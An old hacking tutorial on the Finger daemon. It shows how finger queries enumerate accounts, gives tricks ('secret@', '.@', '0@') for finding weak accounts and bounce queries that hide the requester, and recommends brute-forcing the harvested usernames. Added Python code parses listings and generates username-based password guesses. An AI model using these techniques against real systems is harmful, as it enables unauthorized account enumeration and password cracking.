Table of Contents <================>
1.1 Disclaimer
1.2 An Introduction to Finger
1.3 Using Finger
1.4 Finger Tricks
1.5 Finger Bounce Attack
1.6 Conclusion
1.7 Afterword
1.1 Disclaimer: <=============>
In no way does the author of this tutorial encourage any sort of illegal activity. This tutorial's only purpose is to inform and teach about the Finger daemon and its known weaknesses. The author cannot be held responsible for anything you do with the knowledge in this tutorial. Be a true hacker: learn, and help others learn.
1.2 An Introduction to Finger <===================>
The Finger daemon is a service that normally listens on TCP port 79 (the protocol is described in RFC 1288) and was originally intended as a sort of digital business card. A remote user sends a request to the Finger daemon running on a system and gets a reply. The reply tells you which users are logged in on that system and gives some contact information about them. Besides user info, the reply often also tells you who the admin of the system is and how to reach him.

People used to connect to all sorts of systems all around the world, and Finger gave them a bit more information about whose system they were on and who had accounts there. Finger has always been used primarily at universities, but at large corporations too. Back in the day, Finger was so common at universities that a student asked for contact info by another student would often just reply "Finger me!"

Since the World Wide Web, however, Finger has become less and less popular: we now have websites to serve as our digital business cards, and people have come to realise that with so many security threats these days it is neither a good idea nor worth the trouble to run a Finger daemon. Not everybody has come to that conclusion, though, and you will find there are still plenty of systems out there running the Finger service. And these days everybody with a personal computer seems to be running portscans and trying to break into systems, without any of the basic knowledge required.

The Finger daemon is a great example of a service that hands you a large amount of sensitive information about a target in return for a single unauthenticated request (whether you are allowed to make that request is a matter of the target's policy and your local law, not of the protocol). So in this tutorial I will try to explain, in understandable language, what the Finger daemon is, what it does and how it can be used to your advantage.
1.3 Using Finger <==========>
When a portscan of www.foobar.com shows port 79 open / listening, something is answering on the standard finger port, and in practice that is a Finger daemon (fingerd). Now how do we send it a request? The protocol is very simple: the client opens a TCP connection to port 79, sends one line of text terminated by CRLF, and reads the reply until the server closes the connection. So if you have no finger client at hand you can just telnet to the finger server like this:

telnet www.foobar.com 79

and then type the query you want to issue, followed by Enter. (Windows does actually ship a finger.exe client, but the telnet route shows you exactly what goes over the wire.) From a *nix shell we don't need telnet, because a finger client is almost always installed and we can just type the commands. From here on I will assume you are using a *nix shell. If you use telnet instead, type the same query as in the *nix examples but leave out the leading "finger" and the "@host.com" part: "finger .@foobar.com" becomes a single line containing "." (without the quotes) typed after you have telnetted into port 79 of the right host, and an empty line (just Enter) is the equivalent of "finger @foobar.com". So, we want to finger www.foobar.com; this is how we do it:

finger @foobar.com
Results:

Login      Name               Tty       Idle   When        Where
root       foobar sys         console   17d    Tue 10:13   node0ls3.foobar.com
<.......>  Amos Amanda        <.......>
<.......>  Anderson Kenneth   <.......>
<.......>  Bright Adrian      <.......>
<.......>  Doe John           <.......>
<.......>  Johnson Peter      <.......>
<.......>  Mitnick Kevin      <.......>
<.......>  Munson Greg        <.......>
<.......>  Orwell Dennis      <.......>

(<.......> marks fields of the listing that are not preserved on this page.)
Now what does this tell us? The first column holds the login names and the second the "real names", which of course don't always have to be real names, but most of the time actually are. The third column shows the terminal (tty) the user is logged in on, and the fourth the idle time. After that come the time the session started and the place (remote host) the account logged in from. Sometimes you get more columns with office, e-mail address, phone numbers, etc.
If you would like to have more information on a specific user (Peter Johnson for example) you would now enter the command:
finger johnson@foobar.com
1.4 Finger Tricks <===========>
I hope by now you have seen what the main and huge weakness of Finger is. For those of you who haven't, I will explain. The Finger daemon shows you which accounts exist on a system. That means you have gained, with one unauthenticated request, 50% of that magical username/password combination that gives access to a system. Once you have the usernames, the next step would be to load up a (perl) brute-force or wordlist password cracker. There are scripts written specifically for telnet, for example (check out http://www.thehackerschoice.com/ or search for VLAD's pwscan.pl). First make a wordlist of passwords that are the same or almost the same as the usernames; if that doesn't work, start the brute-force script, get some coffee, sit back and relax till the script has done the work for you. Keep in mind that every guess ends up in the target's logs, and that many systems lock an account after a handful of failed logins.

Of course we find some accounts on a host more interesting than others: mainly the root or admin account, because of its special privileges, and of course any other account that we think might have an easy-to-guess / easy-to-crack password. There are a few nice tricks to get just these kinds of accounts. For example, type in the command:
finger secret@foobar.com
When you issue this command the Finger daemon reports the accounts that match "secret". On BSD-derived fingerd that means a login name equal to "secret" or a real name containing "secret" as a separate word, compared case-insensitively (whole words, not substrings; other implementations may be looser). What's so special about that? Well, you could use "test" or "temp" or "0000" instead of "secret", and as you probably know these kinds of accounts very often have rather easy passwords: passwords that are the same as the username, or almost the same (test0, test1, etc.). Two more queries that old finger daemons are known to answer generously:

finger .@foobar.com
finger 0@foobar.com

Try them and see what happens! Get to know the Finger daemon, read RFC 1288 and find your own tricks!
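The query format from section 1.3 and the account matching from section 1.4, as an added example (my code, not part of the original tutorial): it builds the exact bytes a finger client puts on the wire, parses the short listing a Finger daemon returns, reproduces the BSD-style matching behind "finger secret@host", and derives the username-based first guesses the text recommends. The reply text inside the block is constructed to look like the listing above; it was not captured from a real host. The finger() function is a real network call and is only there for completeness; the rest runs offline.

```python
"""Finger (RFC 1288) client helpers plus a parser for the short listing
a Finger daemon returns.  Added example, not the tutorial's own code; the
reply text below is constructed to look like a BSD-style listing, it was
not captured from a real host."""
import socket

FINGER_PORT = 79
COLUMNS = ["Login", "Name", "Tty", "Idle", "When", "Where"]


def build_query(user="", hosts=(), verbose=False):
    """Bytes a finger client puts on the wire.  RFC 1288 {Q1}/{Q2}:
    optional "/W " (what `finger -l` sends), optional user, zero or
    more "@host" parts, then CRLF.  An empty query (just CRLF) is what
    "finger @foobar.com" sends: it lists everyone logged in."""
    q = "/W " if verbose else ""
    q += user + "".join("@" + h for h in hosts)
    return (q + "\r\n").encode("ascii")


def finger(host, user="", verbose=False, timeout=5.0):
    """Send one query to host:79 and return the reply text (real network
    call; the offline demo below does not use it)."""
    with socket.create_connection((host, FINGER_PORT), timeout=timeout) as s:
        s.sendall(build_query(user, verbose=verbose))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:        # the server closes the connection when done
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


def parse_short_listing(text):
    """Parse the columnar short listing into dicts keyed by COLUMNS.
    Column boundaries are taken from the header line, so real names
    containing spaces ("Johnson Peter") survive intact."""
    lines = [l.rstrip() for l in text.splitlines() if l.strip()]
    header = next((l for l in lines if l.startswith(COLUMNS[0])), None)
    if header is None:
        return []
    starts = [header.index(c) for c in COLUMNS]
    bounds = list(zip(starts, starts[1:] + [None]))
    records = []
    for line in lines[lines.index(header) + 1:]:
        rec = {c: line[a:b].strip() for c, (a, b) in zip(COLUMNS, bounds)}
        if rec["Login"]:
            records.append(rec)
    return records


def matching_accounts(records, word):
    """Logins that "finger word@host" would report.  BSD finger matches
    the login name or any single word of the real name, case-insensitively
    (whole words: "secret" does not hit "secretary").  Other fingerd
    implementations may match differently."""
    w = word.lower()
    return [r["Login"] for r in records
            if r["Login"].lower() == w
            or w in r["Name"].lower().replace(",", " ").split()]


def username_candidates(login):
    """The "same or almost the same as the username" guesses the tutorial
    says to try first: login, Login, loginlogin, login0 .. login9."""
    return ([login, login.capitalize(), login + login]
            + [login + str(i) for i in range(10)])


# Constructed sample reply, shaped like the listing in section 1.3.
SAMPLE_REPLY = (
    "Login     Name              Tty      Idle  When       Where\r\n"
    "root      foobar sys        console  17d   Tue 10:13  node0ls3.foobar.com\r\n"
    "johnson   Johnson Peter     pts/2    2:31  Wed 09:02  dialup-3.isp.example\r\n"
    "test      Test Account      pts/4          Wed 09:40  10.1.2.3\r\n"
    "secretary Smith Jane        pts/7    1:05  Wed 08:55  10.1.2.9\r\n"
)

if __name__ == "__main__":
    print(build_query())                          # b'\r\n'
    print(build_query("johnson", verbose=True))   # b'/W johnson\r\n'
    accounts = parse_short_listing(SAMPLE_REPLY)
    for r in accounts:
        print(r["Login"], "->", r["Name"], "from", r["Where"])
    print(matching_accounts(accounts, "peter"))   # ['johnson']
    print(username_candidates("test"))
```

The parser keys on the header line rather than splitting on whitespace, because the Name column contains spaces and the Idle column is often empty; a naive split() would shift every field to the left for such rows. Note that the "secret" query only matches whole words here, which is why the "test" account is found but "secretary" is not.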
1.5 Finger Bounce Attack <=================>
It is also possible to hop from one Finger daemon to another. The protocol allows a query of the form user@host1@host2: your client connects to the LAST host in the chain (host2) and sends it "user@host1"; host2 then connects to host1 and asks it for "user". So if I want to finger www.victim.com and know that www.host.com also runs Finger, I make the request like this:

finger @victim.com@host.com

Host.com now fingers victim.com and shows me the results. (Mind the order: "finger @host.com@victim.com" does the opposite, contacting victim.com first and asking it to finger host.com.) One advantage is that I am now somewhat hidden: if www.victim.com logs requests, it sees www.host.com in its logs, not me. Somewhat, because host.com's own logs still record my address; the bounce relays the query, it does not anonymise it. A second advantage is that I can let a trusted host finger another computer on the same network that would normally not accept an incoming finger request from me. One caveat: RFC 1288 leaves forwarding optional and warns about exactly this kind of abuse, so many Finger daemons simply refuse any query containing an @host part, and you will get an error instead of a listing.
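The routing of a chained query, as an added example (my code, not from the tutorial): it reproduces the split the BSD finger client performs on its argument (strrchr on '@', so the host after the last '@' is the one contacted and the remainder is sent to it verbatim) and then repeats that split once per hop, the way a forwarding Finger daemon does. The hostnames are the tutorial's placeholders; the max_hops cap is my own addition.

```python
"""How a chained finger query is routed.  Added example, not the
tutorial's own code.  It reproduces the split the BSD finger client
performs (strrchr(name, '@')): the host after the LAST '@' is the one
your client connects to, and whatever is left of the string is sent to
that host verbatim; a forwarding fingerd repeats the same split."""


def split_query(query):
    """Return (host_to_contact, text_to_send).  No '@' means a local query."""
    if "@" not in query:
        return None, query
    rest, _, host = query.rpartition("@")
    return host, rest


def forwarding_chain(query, max_hops=8):
    """Hops taken by "finger <query>", from your client outward, as
    (host contacted, query line that host receives).  The last hop is
    the host whose user database actually answers.  Capped (my choice,
    not part of the protocol) so a looping chain cannot recurse forever."""
    hops = []
    host, rest = split_query(query)
    while host is not None:
        hops.append((host, rest))
        if len(hops) > max_hops:
            raise ValueError("forwarding chain too long")
        host, rest = split_query(rest)
    return hops


def final_target(query):
    """Host that finally runs the user lookup, or None for a local query."""
    hops = forwarding_chain(query)
    return hops[-1][0] if hops else None


if __name__ == "__main__":
    # What the bounce in section 1.5 wants: host.com does the fingering.
    for host, line in forwarding_chain("@victim.com@host.com"):
        print(f"connect to {host!r}, send {line!r}")
    # The other order contacts victim.com first and asks IT to finger host.com.
    print(final_target("@host.com@victim.com"))   # host.com
```

Reading the chain from the client outward makes the defender's view obvious too: each host in the chain only ever sees the one before it, which is exactly why RFC 1288 lets a site refuse forwarded queries.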
1.6 Conclusion <==========>
The Finger daemon can be a huge source of information for anyone trying to gain access to a system: it hands out half of the username/password combination needed to get in. There are a few nice tricks to get the specific accounts you are looking for, and after that it is just a question of running a script that cracks the passwords, using either a wordlist or brute force. Also keep in mind the advantages (and the limits) of a bounce attack through a forwarding Finger daemon.
1.7 Afterword <========>
I hope some of you out there who are new to the computer security / hacking scene have learned a thing or two from this tutorial. There's more at http://paris2k.no-ip.org or http://paris2k.tk
P2K alias Paris2K